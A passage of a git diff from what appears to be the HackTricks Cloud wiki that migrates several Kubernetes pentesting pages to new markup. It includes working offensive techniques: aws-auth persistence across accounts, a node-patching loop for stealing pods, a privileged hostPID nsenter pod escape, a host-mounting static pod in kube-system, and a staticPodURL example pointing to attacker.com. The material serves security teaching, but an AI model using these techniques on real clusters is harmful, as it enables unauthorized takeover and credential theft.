+      username: system:node{{EC2PrivateDNSName}}
       groups:
         - system:masters
   mapUsers: |
@@ -457,29 +449,26 @@ data:
       groups:
         - system:masters
 ```
-{% endcode %}
 
-{% hint style="warning" %}
-You can use **`aws-auth`** for **persistence** giving access to users from **other accounts**.
-
-However, `aws --profile other_account eks update-kubeconfig --name ` **doesn't work from a different acount**. But actually `aws --profile other_account eks get-token --cluster-name arn:aws:eks:us-east-1:123456789098:cluster/Testing` works if you put the ARN of the cluster instead of just the name.\
-To make `kubectl` work, just make sure to **configure** the **victims kubeconfig** and in the aws exec args add `--profile other_account_role` so kubectl will be using the others account profile to get the token and contact AWS.
-{% endhint %}
+> [!WARNING]
+> You can use **`aws-auth`** for **persistence** giving access to users from **other accounts**.
+>
+> However, `aws --profile other_account eks update-kubeconfig --name ` **doesn't work from a different acount**. But actually `aws --profile other_account eks get-token --cluster-name arn:aws:eks:us-east-1:123456789098:cluster/Testing` works if you put the ARN of the cluster instead of just the name.\
+> To make `kubectl` work, just make sure to **configure** the **victims kubeconfig** and in the aws exec args add `--profile other_account_role` so kubectl will be using the others account profile to get the token and contact AWS.
 
 ### Escalating in GKE
 
 There are **2 ways to assign K8s permissions to GCP principals**. In any case the principal also needs the permission **`container.clusters.get`** to be able to gather credentials to access the cluster, or you will need to **generate your own kubectl config file** (follow the next link).
 
-{% hint style="warning" %}
-When talking to the K8s api endpoint, the **GCP auth token will be sent**. Then, GCP, through the K8s api endpoint, will first **check if the principal** (by email) **has any access inside the cluster**, then it will check if it has **any access via GCP IAM**.\
-If **any** of those are **true**, he will be **responded**. If **not** an **error** suggesting to give **permissions via GCP IAM** will be given.
-{% endhint %}
+> [!WARNING]
+> When talking to the K8s api endpoint, the **GCP auth token will be sent**. Then, GCP, through the K8s api endpoint, will first **check if the principal** (by email) **has any access inside the cluster**, then it will check if it has **any access via GCP IAM**.\
+> If **any** of those are **true**, he will be **responded**. If **not** an **error** suggesting to give **permissions via GCP IAM** will be given.
 
 Then, the first method is using **GCP IAM**, the K8s permissions have their **equivalent GCP IAM permissions**, and if the principal have it, it will be able to use it.
 
-{% content-ref url="../../gcp-security/gcp-privilege-escalation/gcp-container-privesc.md" %}
-[gcp-container-privesc.md](../../gcp-security/gcp-privilege-escalation/gcp-container-privesc.md)
-{% endcontent-ref %}
+{{#ref}}
+../../gcp-security/gcp-privilege-escalation/gcp-container-privesc.md
+{{#endref}}
 
 The second method is **assigning K8s permissions inside the cluster** to the identifying the user by its **email** (GCP service accounts included).
 
@@ -506,9 +495,9 @@ Then he can update/create new roles, clusterroles with better permissions than t
 
 Principals with access to the **`nodes/proxy`** subresource can **execute code on pods** via the Kubelet API (according to [**this**](https://github.com/PaloAltoNetworks/rbac-police/blob/main/lib/nodes_proxy.rego)). More information about Kubelet authentication in this page:
 
-{% content-ref url="../pentesting-kubernetes-services/kubelet-authentication-and-authorization.md" %}
-[kubelet-authentication-and-authorization.md](../pentesting-kubernetes-services/kubelet-authentication-and-authorization.md)
-{% endcontent-ref %}
+{{#ref}}
+../pentesting-kubernetes-services/kubelet-authentication-and-authorization.md
+{{#endref}}
 
 You have an example of how to get [**RCE talking authorized to a Kubelet API here**](../pentesting-kubernetes-services/#kubelet-rce).
 
@@ -516,7 +505,6 @@ You have an example of how to get [**RCE talking authorized to a Kubelet API her
 
 Principals that can **delete pods** (`delete` verb over `pods` resource), or **evict pods** (`create` verb over `pods/eviction` resource), or **change pod status** (access to `pods/status`) and can **make other nodes unschedulable** (access to `nodes/status`) or **delete nodes** (`delete` verb over `nodes` resource) and has control over a pod, could **steal pods from other nodes** so they are **executed** in the **compromised** **node** and the attacker can **steal the tokens** from those pods.
 
-{% code overflow="wrap" %}
 ```bash
 patch_node_capacity(){
     curl -s -X PATCH 127.0.0.1:8001/api/v1/nodes/$1/status -H "Content-Type: json-patch+json" -d '[{"op": "replace", "path":"/status/allocatable/pods", "value": "0"}]'
@@ -527,7 +515,6 @@ while true; do patch_node_capacity ; done &
 
 kubectl delete pods -n kube-system 
 ```
-{% endcode %}
 
 ### Services status (CVE-2020-8554)
 
@@ -545,15 +532,13 @@ This system ensures that **users cannot elevate their privileges by modifying ro
 
 The rule stipulates that a **user can only create or update a role if they possess all the permissions the role comprises**. Moreover, the scope of the user's existing permissions must align with that of the role they are attempting to create or modify: either cluster-wide for ClusterRoles or confined to the same namespace (or cluster-wide) for Roles.
 
-{% hint style="warning" %}
-There is an exception to the previous rule. If a principal has the **verb `escalate`** over **`roles`** or **`clusterroles`** he can increase the privileges of roles and clusterroles even without having the permissions himself.
-{% endhint %}
+> [!WARNING]
+> There is an exception to the previous rule. If a principal has the **verb `escalate`** over **`roles`** or **`clusterroles`** he can increase the privileges of roles and clusterroles even without having the permissions himself.
 
 ### **Get & Patch RoleBindings/ClusterRoleBindings**
 
-{% hint style="danger" %}
-**Apparently this technique worked before, but according to my tests it's not working anymore for the same reason explained in the previous section. Yo cannot create/modify a rolebinding to give yourself or a different SA some privileges if you don't have already.**
-{% endhint %}
+> [!CAUTION]
+> **Apparently this technique worked before, but according to my tests it's not working anymore for the same reason explained in the previous section. Yo cannot create/modify a rolebinding to give yourself or a different SA some privileges if you don't have already.**
 
 The privilege to create Rolebindings allows a user to **bind roles to a service account**. This privilege can potentially lead to privilege escalation because it **allows the user to bind admin privileges to a compromised service account.**
 
@@ -589,15 +574,20 @@ Edit your .yaml and add the uncomment lines:
 #  containers:
 #  - name: sec-ctx-demo
 #    image: busybox
-    command: [ "sh", "-c", "apt update && apt install iptables -y && iptables -L && sleep 1h" ]
-    securityContext:
-      capabilities:
-        add: ["NET_ADMIN"]
- #   volumeMounts:
- #   - name: sec-ctx-vol
- #     mountPath: /data/demo
- #   securityContext:
- #     allowPrivilegeEscalation: true
+command:
+  [
+    "sh",
+    "-c",
+    "apt update && apt install iptables -y && iptables -L && sleep 1h",
+  ]
+securityContext:
+  capabilities:
+    add: ["NET_ADMIN"]
+#   volumeMounts:
+#   - name: sec-ctx-vol
+#     mountPath: /data/demo
+#   securityContext:
+#     allowPrivilegeEscalation: true
 ```
 
 See the logs of the proxy:
@@ -630,7 +620,7 @@ kubectl get mutatingwebhookconfigurations
 kubectl get deploy,svc -n webhook-demo
 ```
 
-![mutating-webhook-status-check.PNG](https://cdn.hashnode.com/res/hashnode/image/upload/v1628433436353/yHUvUWugR.png?auto=compress,format\&format=webp)
+![mutating-webhook-status-check.PNG](https://cdn.hashnode.com/res/hashnode/image/upload/v1628433436353/yHUvUWugR.png?auto=compress,format&format=webp)
 
 Then deploy a new pod:
 
@@ -646,7 +636,7 @@ kubectl get po nginx -o=jsonpath='{.spec.containers[].image}{"\n"}'
 kubectl describe po nginx | grep "Image: "
 ```
 
-![malicious-admission-controller.PNG](https://cdn.hashnode.com/res/hashnode/image/upload/v1628433512073/leFXtgSzm.png?auto=compress,format\&format=webp)
+![malicious-admission-controller.PNG](https://cdn.hashnode.com/res/hashnode/image/upload/v1628433512073/leFXtgSzm.png?auto=compress,format&format=webp)
 
 As you can see in the above image, we tried running image `nginx` but the final executed image is `rewanthtammana/malicious-image`. What just happened!!?
 
@@ -666,50 +656,43 @@ The above snippet replaces the first container image in every pod with `rewantht
 
 ## OPA Gatekeeper bypass
 
-{% content-ref url="../kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md" %}
-[kubernetes-opa-gatekeeper-bypass.md](../kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md)
-{% endcontent-ref %}
+{{#ref}}
+../kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md
+{{#endref}}
 
 ## Best Practices
 
 ### **Disabling Automount of Service Account Tokens**
 
-* **Pods and Service Accounts**: By default, pods mount a service account token. To enhance security, Kubernetes allows the disabling of this automount feature.
-* **How to Apply**: Set `automountServiceAccountToken: false` in the configuration of service accounts or pods starting from Kubernetes version 1.6.
+- **Pods and Service Accounts**: By default, pods mount a service account token. To enhance security, Kubernetes allows the disabling of this automount feature.
+- **How to Apply**: Set `automountServiceAccountToken: false` in the configuration of service accounts or pods starting from Kubernetes version 1.6.
 
 ### **Restrictive User Assignment in RoleBindings/ClusterRoleBindings**
 
-* **Selective Inclusion**: Ensure that only necessary users are included in RoleBindings or ClusterRoleBindings. Regularly audit and remove irrelevant users to maintain tight security.
+- **Selective Inclusion**: Ensure that only necessary users are included in RoleBindings or ClusterRoleBindings. Regularly audit and remove irrelevant users to maintain tight security.
 
 ### **Namespace-Specific Roles Over Cluster-Wide Roles**
 
-* **Roles vs. ClusterRoles**: Prefer using Roles and RoleBindings for namespace-specific permissions rather than ClusterRoles and ClusterRoleBindings, which apply cluster-wide. This approach offers finer control and limits the scope of permissions.
+- **Roles vs. ClusterRoles**: Prefer using Roles and RoleBindings for namespace-specific permissions rather than ClusterRoles and ClusterRoleBindings, which apply cluster-wide. This approach offers finer control and limits the scope of permissions.
 
 ### **Use automated tools**
 
-{% embed url="https://github.com/cyberark/KubiScan" %}
+{{#ref}}
+https://github.com/cyberark/KubiScan
+{{#endref}}
 
-{% embed url="https://github.com/aquasecurity/kube-hunter" %}
+{{#ref}}
+https://github.com/aquasecurity/kube-hunter
+{{#endref}}
 
-{% embed url="https://github.com/aquasecurity/kube-bench" %}
+{{#ref}}
+https://github.com/aquasecurity/kube-bench
+{{#endref}}
 
 ## **References**
 
-* [**https://www.cyberark.com/resources/threat-research-blog/securing-kubernetes-clusters-by-eliminating-risky-permissions**](https://www.cyberark.com/resources/threat-research-blog/securing-kubernetes-clusters-by-eliminating-risky-permissions)
-* [**https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-1**](https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-1)
-* [**https://blog.rewanthtammana.com/creating-malicious-admission-controllers**](https://blog.rewanthtammana.com/creating-malicious-admission-controllers)
+- [**https://www.cyberark.com/resources/threat-research-blog/securing-kubernetes-clusters-by-eliminating-risky-permissions**](https://www.cyberark.com/resources/threat-research-blog/securing-kubernetes-clusters-by-eliminating-risky-permissions)
+- [**https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-1**](https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-1)
+- [**https://blog.rewanthtammana.com/creating-malicious-admission-controllers**](https://blog.rewanthtammana.com/creating-malicious-admission-controllers)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.md b/src/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.md
similarity index 80%
rename from pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.md
rename to src/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.md
index c32fbcd56..30b1a245e 100644
--- a/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.md
+++ b/src/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.md
@@ -1,19 +1,6 @@
 # Kubernetes Roles Abuse Lab
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 You can run these labs just inside **minikube**.
 
@@ -21,18 +8,17 @@ You can run these labs just inside **minikube**.
 
 We are going to create:
 
-* A **Service account "test-sa"** with a cluster privilege to **read secrets**
-  * A ClusterRole "test-cr" and a ClusterRoleBinding "test-crb" will be created
-* **Permissions** to list and **create** pods to a user called "**Test**" will be given
-  * A Role "test-r" and RoleBinding "test-rb" will be created
-* Then we will **confirm** that the SA can list secrets and that the user Test can list a pods
-* Finally we will **impersonate the user Test** to **create a pod** that includes the **SA test-sa** and **steal** the service account **token.**
-  * This is the way yo show the user could escalate privileges this way
+- A **Service account "test-sa"** with a cluster privilege to **read secrets**
+  - A ClusterRole "test-cr" and a ClusterRoleBinding "test-crb" will be created
+- **Permissions** to list and **create** pods to a user called "**Test**" will be given
+  - A Role "test-r" and RoleBinding "test-rb" will be created
+- Then we will **confirm** that the SA can list secrets and that the user Test can list a pods
+- Finally we will **impersonate the user Test** to **create a pod** that includes the **SA test-sa** and **steal** the service account **token.**
+  - This is the way yo show the user could escalate privileges this way
 
-{% hint style="info" %}
-To create the scenario an admin account is used.\
-Moreover, to **exfiltrate the sa token** in this example the **admin account is used** to exec inside the created pod. However, **as explained here**, the **declaration of the pod could contain the exfiltration of the token**, so the "exec" privilege is not necesario to exfiltrate the token, the **"create" permission is enough**.
-{% endhint %}
+> [!NOTE]
+> To create the scenario an admin account is used.\
+> Moreover, to **exfiltrate the sa token** in this example the **admin account is used** to exec inside the created pod. However, **as explained here**, the **declaration of the pod could contain the exfiltration of the token**, so the "exec" privilege is not necesario to exfiltrate the token, the **"create" permission is enough**.
 
 ```bash
 # Create Service Account test-sa
@@ -349,11 +335,11 @@ kubectl delete serviceaccount test-sa
 
 **Doesn't work:**
 
-* **Create a new RoleBinding** just with the verb **create**
-* **Create a new RoleBinding** just with the verb **patch** (you need to have the binding permissions)
-  * You cannot do this to assign the role to yourself or to a different SA
-* **Modify a new RoleBinding** just with the verb **patch** (you need to have the binding permissions)
-  * You cannot do this to assign the role to yourself or to a different SA
+- **Create a new RoleBinding** just with the verb **create**
+- **Create a new RoleBinding** just with the verb **patch** (you need to have the binding permissions)
+  - You cannot do this to assign the role to yourself or to a different SA
+- **Modify a new RoleBinding** just with the verb **patch** (you need to have the binding permissions)
+  - You cannot do this to assign the role to yourself or to a different SA
 
 ```bash
 echo 'apiVersion: v1
@@ -623,17 +609,4 @@ kubectl delete role test-r2
 kubectl delete serviceaccount test-sa
 ```
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md b/src/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md
new file mode 100644
index 000000000..c9e6f8470
--- /dev/null
+++ b/src/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md
@@ -0,0 +1,49 @@
+# Pod Escape Privileges
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Privileged and hostPID
+
+With these privileges you will have **access to the hosts processes** and **enough privileges to enter inside the namespace of one of the host processes**.\
+Note that you can potentially not need privileged but just some capabilities and other potential defenses bypasses (like apparmor and/or seccomp).
+
+Just executing something like the following will allow you to escape from the pod:
+
+```bash
+nsenter --target 1 --mount --uts --ipc --net --pid -- bash
+```
+
+Configuration example:
+
+```yaml
+apiVersion: v1
+kind: Pod
+metadata:
+  name: priv-and-hostpid-exec-pod
+  labels:
+    app: pentest
+spec:
+  hostPID: true
+  containers:
+    - name: priv-and-hostpid-pod
+      image: ubuntu
+      tty: true
+      securityContext:
+        privileged: true
+      command:
+        [
+          "nsenter",
+          "--target",
+          "1",
+          "--mount",
+          "--uts",
+          "--ipc",
+          "--net",
+          "--pid",
+          "--",
+          "bash",
+        ]
+  #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md b/src/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md
similarity index 72%
rename from pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md
rename to src/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md
index 411155257..e95909ad1 100644
--- a/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md
+++ b/src/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md
@@ -1,19 +1,6 @@
 # Attacking Kubernetes from inside a Pod
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
 
 ## **Pod Breakout**
 
@@ -25,25 +12,29 @@ Learn & practice GCP Hacking:  [!CAUTION]
+> The **`spec` of a static Pod cannot refer to other API objects** (e.g., ServiceAccount, ConfigMap, Secret, etc. So **you cannot abuse this behaviour to launch a pod with an arbitrary serviceAccount** in the current node to compromise the cluster. But you could use this to run pods in different namespaces (in case thats useful for some reason).
 
 If you are inside the node host you can make it create a **static pod inside itself**. This is pretty useful because it might allow you to **create a pod in a different namespace** like **kube-system**.
 
 In order to create a static pod, the [**docs are a great help**](https://kubernetes.io/docs/tasks/configure-pod-container/static-pod/). You basically need 2 things:
 
-* Configure the param **`--pod-manifest-path=/etc/kubernetes/manifests`** in the **kubelet service**, or in the **kubelet config** ([**staticPodPath**](https://kubernetes.io/docs/reference/config-api/kubelet-config.v1beta1/#kubelet-config-k8s-io-v1beta1-KubeletConfiguration)) and restart the service
-* Create the definition on the **pod definition** in **`/etc/kubernetes/manifests`**
+- Configure the param **`--pod-manifest-path=/etc/kubernetes/manifests`** in the **kubelet service**, or in the **kubelet config** ([**staticPodPath**](https://kubernetes.io/docs/reference/config-api/kubelet-config.v1beta1/#kubelet-config-k8s-io-v1beta1-KubeletConfiguration)) and restart the service
+- Create the definition on the **pod definition** in **`/etc/kubernetes/manifests`**
 
 **Another more stealth way would be to:**
 
-* Modify the param **`staticPodURL`** from **kubelet** config file and set something like `staticPodURL: http://attacker.com:8765/pod.yaml`. This will make the kubelet process create a **static pod** getting the **configuration from the indicated URL**.
+- Modify the param **`staticPodURL`** from **kubelet** config file and set something like `staticPodURL: http://attacker.com:8765/pod.yaml`. This will make the kubelet process create a **static pod** getting the **configuration from the indicated URL**.
 
 **Example** of **pod** configuration to create a privilege pod in **kube-system** taken from [**here**](https://research.nccgroup.com/2020/02/12/command-and-kubectl-talk-follow-up/):
 
@@ -317,22 +303,22 @@ metadata:
   namespace: kube-system
 spec:
   containers:
-  - name: bad
-    hostPID: true
-    image: gcr.io/shmoocon-talk-hacking/brick
-    stdin: true
-    tty: true
-    imagePullPolicy: IfNotPresent
-    volumeMounts:
-      - mountPath: /chroot
-        name: host
+    - name: bad
+      hostPID: true
+      image: gcr.io/shmoocon-talk-hacking/brick
+      stdin: true
+      tty: true
+      imagePullPolicy: IfNotPresent
+      volumeMounts:
+        - mountPath: /chroot
+          name: host
   securityContext:
     privileged: true
   volumes:
-  - name: host
-    hostPath:
-      path: /
-      type: Directory
+    - name: host
+      hostPath:
+        path: /
+        type: Directory
 ```
 
 ### Delete pods + unschedulable nodes
@@ -342,7 +328,7 @@ For [**more info follow this links**](abusing-roles-clusterroles-in-kubernetes/#
 
 ## Automatic Tools
 
-* [**https://github.com/inguardians/peirates**](https://github.com/inguardians/peirates)
+- [**https://github.com/inguardians/peirates**](https://github.com/inguardians/peirates)
 
 ```
 Peirates v1.1.8-beta by InGuardians
@@ -404,19 +390,6 @@ Off-Menu         +
 [exit] Exit Peirates
 ```
 
-* [**https://github.com/r0binak/MTKPI**](https://github.com/r0binak/MTKPI)
+- [**https://github.com/r0binak/MTKPI**](https://github.com/r0binak/MTKPI)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.md b/src/pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.md
similarity index 67%
rename from pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.md
rename to src/pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.md
index fec9cdaec..8f96b119f 100644
--- a/pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.md
+++ b/src/pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.md
@@ -1,19 +1,6 @@
 # Exposing Services in Kubernetes
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
 
 There are **different ways to expose services** in Kubernetes so both **internal** endpoints and **external** endpoints can access them. This Kubernetes configuration is pretty critical as the administrator could give access to **attackers to services they shouldn't be able to access**.
 
@@ -56,28 +43,26 @@ to access this service:
 ```yaml
 apiVersion: v1
 kind: Service
-metadata:  
+metadata:
   name: my-internal-service
 spec:
   selector:
     app: my-app
   type: ClusterIP
-  ports:  
-  - name: http
-    port: 80
-    targetPort: 80
-    protocol: TCP
+  ports:
+    - name: http
+      port: 80
+      targetPort: 80
+      protocol: TCP
 ```
 
 _This method requires you to run `kubectl` as an **authenticated user**._
 
 List all ClusterIPs:
 
-{% code overflow="wrap" %}
 ```bash
 kubectl get services --all-namespaces -o=custom-columns='NAMESPACE:.metadata.namespace,NAME:.metadata.name,TYPE:.spec.type,CLUSTER-IP:.spec.clusterIP,PORT(S):.spec.ports[*].port,TARGETPORT(S):.spec.ports[*].targetPort,SELECTOR:.spec.selector' | grep ClusterIP
 ```
-{% endcode %}
 
 ### NodePort
 
@@ -85,29 +70,27 @@ When **NodePort** is utilised, a designated port is made available on all Nodes
 
 List all NodePorts:
 
-{% code overflow="wrap" %}
 ```bash
 kubectl get services --all-namespaces -o=custom-columns='NAMESPACE:.metadata.namespace,NAME:.metadata.name,TYPE:.spec.type,CLUSTER-IP:.spec.clusterIP,PORT(S):.spec.ports[*].port,NODEPORT(S):.spec.ports[*].nodePort,TARGETPORT(S):.spec.ports[*].targetPort,SELECTOR:.spec.selector' | grep NodePort
 ```
-{% endcode %}
 
 An example of NodePort specification:
 
 ```yaml
 apiVersion: v1
 kind: Service
-metadata:  
+metadata:
   name: my-nodeport-service
 spec:
-  selector:    
+  selector:
     app: my-app
   type: NodePort
-  ports:  
-  - name: http
-    port: 80
-    targetPort: 80
-    nodePort: 30036
-    protocol: TCP
+  ports:
+    - name: http
+      port: 80
+      targetPort: 80
+      nodePort: 30036
+      protocol: TCP
 ```
 
 If you **don't specify** the **nodePort** in the yaml (it's the port that will be opened) a port in the **range 30000–32767 will be used**.
@@ -120,19 +103,16 @@ You have to pay for a LoadBalancer per exposed service, which can be expensive.
 
 List all LoadBalancers:
 
-{% code overflow="wrap" %}
 ```bash
 kubectl get services --all-namespaces -o=custom-columns='NAMESPACE:.metadata.namespace,NAME:.metadata.name,TYPE:.spec.type,CLUSTER-IP:.spec.clusterIP,EXTERNAL-IP:.status.loadBalancer.ingress[*],PORT(S):.spec.ports[*].port,NODEPORT(S):.spec.ports[*].nodePort,TARGETPORT(S):.spec.ports[*].targetPort,SELECTOR:.spec.selector' | grep LoadBalancer
 ```
-{% endcode %}
 
 ### External IPs 
 
-{% hint style="success" %}
-External IPs are exposed by services of type Load Balancers and they are generally used when an external Cloud Provider Load Balancer is being used.
-
-For finding them, check for load balancers with values in the `EXTERNAL-IP` field.
-{% endhint %}
+> [!TIP]
+> External IPs are exposed by services of type Load Balancers and they are generally used when an external Cloud Provider Load Balancer is being used.
+>
+> For finding them, check for load balancers with values in the `EXTERNAL-IP` field.
 
 Traffic that ingresses into the cluster with the **external IP** (as **destination IP**), on the Service port, will be **routed to one of the Service endpoints**. `externalIPs` are not managed by Kubernetes and are the responsibility of the cluster administrator.
 
@@ -176,11 +156,9 @@ When looking up the host `my-service.prod.svc.cluster.local`, the cluster DNS Se
 
 List all ExternalNames:
 
-{% code overflow="wrap" %}
 ```bash
 kubectl get services --all-namespaces | grep ExternalName
 ```
-{% endcode %}
 
 ### Ingress
 
@@ -202,28 +180,26 @@ spec:
     serviceName: other
     servicePort: 8080
   rules:
-  - host: foo.mydomain.com
-    http:
-      paths:
-      - backend:
-          serviceName: foo
-          servicePort: 8080
-  - host: mydomain.com
-    http:
-      paths:
-      - path: /bar/*
-        backend:
-          serviceName: bar
-          servicePort: 8080
+    - host: foo.mydomain.com
+      http:
+        paths:
+          - backend:
+              serviceName: foo
+              servicePort: 8080
+    - host: mydomain.com
+      http:
+        paths:
+          - path: /bar/*
+            backend:
+              serviceName: bar
+              servicePort: 8080
 ```
 
 List all the ingresses:
 
-{% code overflow="wrap" %}
 ```bash
 kubectl get ingresses --all-namespaces -o=custom-columns='NAMESPACE:.metadata.namespace,NAME:.metadata.name,RULES:spec.rules[*],STATUS:status'
 ```
-{% endcode %}
 
 Although in this case it's better to get the info of each one by one to read it better:
 
@@ -233,20 +209,7 @@ kubectl get ingresses --all-namespaces -o=yaml
 
 ### References
 
-* [https://medium.com/google-cloud/kubernetes-nodeport-vs-loadbalancer-vs-ingress-when-should-i-use-what-922f010849e0](https://medium.com/google-cloud/kubernetes-nodeport-vs-loadbalancer-vs-ingress-when-should-i-use-what-922f010849e0)
-* [https://kubernetes.io/docs/concepts/services-networking/service/](https://kubernetes.io/docs/concepts/services-networking/service/)
+- [https://medium.com/google-cloud/kubernetes-nodeport-vs-loadbalancer-vs-ingress-when-should-i-use-what-922f010849e0](https://medium.com/google-cloud/kubernetes-nodeport-vs-loadbalancer-vs-ingress-when-should-i-use-what-922f010849e0)
+- [https://kubernetes.io/docs/concepts/services-networking/service/](https://kubernetes.io/docs/concepts/services-networking/service/)
 
-{% hint style="success" %}
